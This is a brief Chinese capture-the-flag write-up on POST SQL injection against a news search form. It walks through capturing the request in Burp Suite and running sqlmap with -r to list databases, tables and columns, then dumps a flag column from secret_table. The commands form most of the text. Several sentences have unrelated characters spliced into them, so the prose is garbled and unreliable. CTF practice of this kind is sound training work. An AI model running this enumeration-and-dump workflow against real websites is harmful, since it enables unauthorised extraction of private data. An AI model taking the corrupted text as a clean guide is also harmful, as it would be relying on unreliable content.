題目信息:
工具:bp,SQLmap
知識(shí)點(diǎn):sql注入之post注入
打開題目司志,有一處搜索框刨秆,搜索新聞囱井。考慮SQL注入六剥。
保存為123.txt
然后用sqlmap一鍵注入(-r 表示從一個(gè)文件中載入HTTP請(qǐng)求,123.txt如果沒有放到sqlmap目錄就用絕對(duì)路徑)
0x01:查找數(shù)據(jù)庫(kù)
python sqlmap.py -r D:\SQLmap\123.txt --dbs
0x02:查找表
python sqlmap.py -r D:\SQLmap\123.txt --tables -D news
0x03:查找字段
python sqlmap.py -r D:\SQLmap\123.txt --column -D news -T secret_table
0x04:顯示字段信息
python sqlmap.py -r D:\SQLmap\123.txt --dump -D news -T secret_table -C fl4g
參考:sqlmap用于sql注入語法